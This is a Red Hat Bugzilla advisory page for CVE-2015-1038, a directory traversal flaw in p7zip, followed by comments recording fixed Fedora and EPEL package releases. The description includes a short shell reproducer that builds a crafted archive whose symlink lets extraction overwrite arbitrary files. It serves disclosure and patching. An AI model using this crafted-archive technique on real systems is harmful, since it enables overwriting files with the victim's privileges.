Bug 1179505 (CVE-2015-1038) - CVE-2015-1038 p7zip: directory traversal vulnerability
Summary: CVE-2015-1038 p7zip: directory traversal vulnerability
Keywords:
Status: CLOSED CURRENTRELEASE
Alias: CVE-2015-1038
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2015-01-06 23:18 UTC by Vincent Danen
Modified: 2019-09-29 13:26 UTC (History)
5 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2015-12-06 23:13:45 UTC


Attachments (Terms of Use)

Description Vincent Danen 2015-01-06 23:18:33 UTC
It was reported [1] that p7zip suffers from a directory traversal flaw.  This could for the overwriting of arbitrary files through uncompressing a crafted archive, with the privileges of the user running 7z.  For example:

$ ln -s /tmp foo
$ 7z a test.7z foo
$ rm foo
$ mkdir foo
$ echo hello > foo/test
$ 7z a test.7z foo/test
$ rm -rf foo
$ 7z x test.7z

This will create 'foo' as a symlink to /tmp which will in turn contain the file 'test' with the privileges of the user unarchiving 'test.7z'.


[1] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774660

Comment 1 Fedora Update System 2015-12-06 01:21:14 UTC
p7zip-15.09-4.fc23 has been pushed to the Fedora 23 stable repository. If problems still persist, please make note of it in this bug report.

Comment 2 Fedora Update System 2015-12-20 07:53:11 UTC
p7zip-15.09-4.fc22 has been pushed to the Fedora 22 stable repository. If problems still persist, please make note of it in this bug report.

Comment 3 Fedora Update System 2016-02-10 11:03:10 UTC
p7zip-15.09-9.el6 has been pushed to the Fedora EPEL 6 stable repository. If problems still persist, please make note of it in this bug report.

Comment 4 Fedora Update System 2016-02-10 11:13:22 UTC
p7zip-15.09-9.el7 has been pushed to the Fedora EPEL 7 stable repository. If problems still persist, please make note of it in this bug report.


Note You need to log in before you can comment on or make changes to this bug.